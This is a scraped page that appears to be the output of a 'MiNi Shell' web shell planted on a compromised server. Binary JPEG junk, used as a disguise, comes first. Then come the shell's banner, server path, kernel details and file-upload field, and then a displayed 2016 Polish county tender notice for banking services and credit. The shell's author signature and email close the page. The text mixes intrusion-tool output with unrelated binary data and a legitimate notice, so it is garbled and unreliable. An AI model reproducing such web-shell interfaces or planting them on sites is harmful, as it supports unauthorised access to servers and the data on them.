JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160627/105375-N-2016.html

<p class="kh_header"><b>Garwolin: Bankowa obsługa budżetu Powiatu Garwolińskiego i jednostek organizacyjnych Powiatu Garwolińskiego oraz udzielenie kredytu w rachunku bieżącym budżetu Powiatu</b><br>
<b>Numer ogłoszenia: 105375 - 2016; data zamieszczenia: 27.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Garwoliński , ul. Staszica 15, 08-400 Garwolin, woj. mazowieckie, tel. 25 68 43 010, faks 25 68 43 010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.garwolin-starostwo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bankowa obsługa budżetu Powiatu Garwolińskiego i jednostek organizacyjnych Powiatu Garwolińskiego oraz udzielenie kredytu w rachunku bieżącym budżetu Powiatu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest bankowa obsługa budżetu Powiatu Garwolińskiego i jednostek organizacyjnych Powiatu Garwolińskiego oraz udzielenie kredytu w polskich złotych w rachunku bieżącym budżetu Powiatu, obejmująca następujące usługi:
1/otwieranie, prowadzenie i zamykanie rachunków bieżących i pomocniczych w walucie polskiej i w walutach wymienialnych;
2/przyjmowanie wpłat i wypłat gotówkowych własnych i obcych;
3/udostępnianie elektronicznego systemu obsługi bankowej;
4/realizowanie poleceń przelewów elektronicznych za pośrednictwem systemu
   elektronicznego na rachunki w banku obsługującym i na rachunki w innych bankach, w tym w systemie SORBNET;
5/realizacja poleceń przelewów papierowych na rachunki bankowe w banku obsługującym i na rachunki w innych bankach
6/realizacja płatności w walucie PLN- po przeliczeniu na inną walutę, na rachunki 
w bankach zagranicznych oraz płatności w walutach obcych;
7/sporządzanie wyciągów bankowych w terminie nie później niż do drugiego dnia operacyjnego /wraz z kompletem dokumentów - tj. dokumenty oryginalne lub wtórniki/;
8/udzielanie informacji o stanie i obrotach środków na rachunku;
9/wydawanie blankietów czekowych;
10/lokowanie środków na lokatach w systemie /overnight/ lub innym systemie równoważnym działającym na podobnych zasadach oraz na wynegocjowanych lokatach terminowych;
11/negocjowanie kursów walut wymienialnych o ile zamawiający nie skorzysta z oferty  innych banków w zakresie proponowanych kursów zakupu walut;
12/udostępnienie skrytek bankowych na wniosek i według potrzeb określanych przez zamawiającego; 
13/udzielanie kredytu w rachunku bieżącym
2. W przypadku otwierania nowych rachunków bieżących i pomocniczych wynikających z powołania nowych jednostek organizacyjnych oraz ze zmiany zasad polityki rachunkowości dotyczącej Powiatu Garwolińskiego i jednostek organizacyjnych Powiatu Garwolińskiego, wynagrodzenie za ich obsługę bankową naliczane będzie w sposób analogiczny jak w wyłonionej ofercie na obsługę bankową.
3. Obsługa bankowa będzie realizowana we wskazanej przez wykonawcę jednostce organizacyjnej z siedzibą na terenie miasta Garwolina.
4. Obsługa bankowa będzie realizowana metodą tradycyjną oraz za pośrednictwem elektronicznego systemu obsługi bankowej.
5. Wykonawca zobowiązuje się do bezpłatnego uruchomienia i udostępniania oddzielnie w Starostwie Powiatowym w Garwolinie i innych jednostkach organizacyjnych Powiatu Garwolińskiego internetowego systemu obsługi bankowej, łącznie z dostarczeniem oprogramowania i przeszkoleniem personelu w terminie 14 dni od daty podpisania umowy na obsługę bankową.
6.  Świadczenia odpłatne lub nieodpłatne:
a/prowadzenie rachunków bieżących i pomocniczych z wyłączeniem rachunków Zakładowych Funduszy Świadczeń Socjalnych i Kont Depozytowych,
b/realizacja poleceń przelewów papierowych na rachunki w innych bankach
7. Świadczenia nieodpłatne:
Opłaty i prowizje nie będą pobierane za pozostałe świadczenia niewymienione w ust.6 a i b w szczególności za:
1/otwieranie i zamykanie rachunków bankowych bieżących i pomocniczych,
2/prowadzenie rachunków Zakładowych Funduszy Świadczeń Socjalnych i Kont
    Depozytowych,
3/sporządzanie wyciągów bankowych /wraz z kompletem dokumentów/,
4/udzielanie telefonicznie informacji o stanie i obrotach środków na rachunku,
5/wydanie blankietów czekowych i realizacja czeków,
6/wypłaty i wpłaty gotówkowe z rachunku,
7/realizację poleceń przelewów na konto w banku obsługującym i do innego banku składanego za pośrednictwem elektronicznego systemu obsługi bankowej,
8/realizację poleceń przelewów papierowych na rachunki w banku obsługującym,
9/realizację przelewów papierowych w przypadku awarii elektronicznego systemu obsługi bankowej lub braku dostępu do systemu z przyczyn leżących po stronie banku obsługującego,
10/prowizja od udzielonego kredytu w rachunku bieżącym,
11/sporządzanie i wydawanie zaświadczeń, opinii bankowych oraz informacji, zestawień i potwierdzeń.
8.Realizacja dyspozycji przelewu będzie się odbywała w dniu jego złożenia w banku.
9.Wykonawca zapewni możliwość podglądu sald rachunków bankowych jednostek organizacyjnych objętych  zamówieniem, przez członków Zarządu Powiatu Garwolińskiego, Skarbnika Powiatu oraz pracowników Starostwa Powiatowego w Garwolinie, którzy będą posiadali uprawnienia dostępu do systemu elektronicznej łączności z bankiem ze strony Powiatu Garwolińskiego.
10. Środki na rachunkach bankowych oprocentowane będą według zmiennej stopy procentowej WIBID 1M dla depozytów jednomiesięcznych /branej z notowań w pierwszym dniu roboczym rozpoczynającego się miesiąca odsetkowego/ plus stała marża banku.
10.1. Naliczane odsetki bankowe podlegają kapitalizacji na koniec każdego miesiąca kalendarzowego na rachunkach bankowych z których pochodzą.
11.  Lokowanie środków z rachunków bieżących i pomocniczych na lokatach w systemie /overnight/ lub innym systemie równoważnym działającym na podobnych zasadach przy saldzie min. 100.000 zł odbywało się będzie automatycznie bez pobierania prowizji.
12.  Wykonawca będzie dokonywał na koniec każdego dnia roboczego konsolidacji sald wskazanych rachunków bankowych starostwa oraz jego podległych jednostek organizacyjnych. Konsolidacja sald będzie przeprowadzana metodą obrachunkową /analityczno - obliczeniową zwaną /wirtualną//, tj. bez dokonywania transferu środków i bez realizacji przeksięgowań pomiędzy rachunkami bankowymi, dla wskazanych przez zamawiającego rachunków bankowych. Wykonawca zapewni zamawiającemu bieżący dostęp do raportu z konsolidacji sald w systemie elektronicznym.
13. Wykonawca będzie udzielał Powiatowi Garwolińskiemu na jego wniosek, kredytu w polskich złotych w rachunku bieżącym budżetu Powiatu Garwolińskiego o zmiennym oprocentowaniu, zabezpieczonego w formie weksla in blanco /wraz z deklaracją wekslową/. Maksymalny roczny limit zadłużenia ustalony na okres obowiązywania umowy wynosi 10.000.000 zł. Kredyt z ustanowionym zabezpieczeniem udzielony zostanie bez prowizji przygotowawczej oraz żadnych innych opłat i prowizji z tytułu udzielenia i obsługi kredytu lub jego wykorzystania w niepełnej wysokości co oznacza, że bank ujmuje wszelkie koszty związane z obsługą kredytu w stałej marży banku powiększającej stawkę WIBOR 3M.
14.Koszt obsługi kredytu w rachunku bieżącym budżetu zamawiający ponosi jedynie od kwoty kredytu zwanej kwotą kredytu wykorzystanego. Jest to kwota kredytu, która nie jest zredukowana przez sumę sald rachunków podlegających konsolidacji oraz jest liczona zgodnie z poniższymi przykładami nr I i II.
Kwota kredytu wykorzystanego /niezredukowana przez sumę sald podlegających konsolidacji/ oprocentowana będzie według zmiennej stopy procentowej ustalonej w oparciu o zmienną stawkę bazową WIBOR3M i jest równa stawce bazowej powiększonej o stałą marżę banku w stosunku rocznym. W przypadku marży ujemnej, gdy stawka marży wg wartości bezwzględnej będzie wyższa od stawki WIBOR 3M, koszt kredytu wynosić będzie zero złotych.
Odsetki od wykorzystanego kredytu będą naliczane w kwartalnych okresach rozrachunkowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem jest posiadanie zezwolenia Komisji Nadzoru Bankowego, jeżeli ustawa z dnia 29.08.1997r Prawo bankowe /tekst jednolity Dz.U. z 2002r nr 72 poz. 665 z późn. zm./ nakłada obowiązek posiadania zezwolenia na podjęcie działalności gospodarczej w zakresie objętym zamówieniem. W przypadku Banku Państwowego /art.14 oraz art. Kolejne Prawa Bankowego/ wystarczy podanie rocznika, numeru i pozycji właściwego Dziennika ustaw zawierającego rozporządzenie o utworzeniu banku.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji w ciągu ostatnich trzech lat przed upływem terminu składania ofert /jeżeli okres prowadzenia jest krótszy - w tym okresie/ poprzez wykazanie realizacji na rzecz jednostek samorządu terytorialnego min. 2 usług obsługi bankowej o wartości min.15.000.000,00 zł brutto /obrót na rachunkach bankowych/ każda, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały należycie wykonane.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia i dokumenty wg. metody spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/Wypełniony formularz ofertowy - załącznik nr 4 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Oprocentowanie zmienne a vista - 40</li>
<li>3 - Kredyt - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy w przypadku:
1/Aktualizacji rozwiązań systemu bankowości elektronicznej ze względu na postęp technologiczny /np. wycofanie z obrotu materiałów lub urządzeń/.
2/Zmiany obowiązujących przepisów, jeżeli w skutek zmian konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.
3/Rezygnacji z wykonania części zamówienia.
4/Zmiany kluczowego personelu po stronie wykonawcy/zamawiającego.
5/Waloryzacji wynagrodzenia.
6/Zmiany stawki VAT
7/Wystąpienia siły wyższej.
2.Zamawiający przewiduje jedynie możliwość wprowadzenia zmian w wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
1/stawki podatku od towarów i usług,
2/wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-   5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę,
3/zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli zmiany e będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
3.Zamawiający zastrzega sobie prawo odstąpienia od umowy na podstawie art. 145 ustawy Pzp.
4.Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.garwolin-starostwo.pl, e-bip - zakładka -Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe  w Garwolinie ul. Staszica 15,  08-400  Garwolin,  Bud. B, pokój nr 34..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2016 godzina 10:30, miejsce: Starostwo Powiatowe w Garwolinie ul. Staszica 15,  08-400  Garwolin,  pokój nr 3 tj. kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com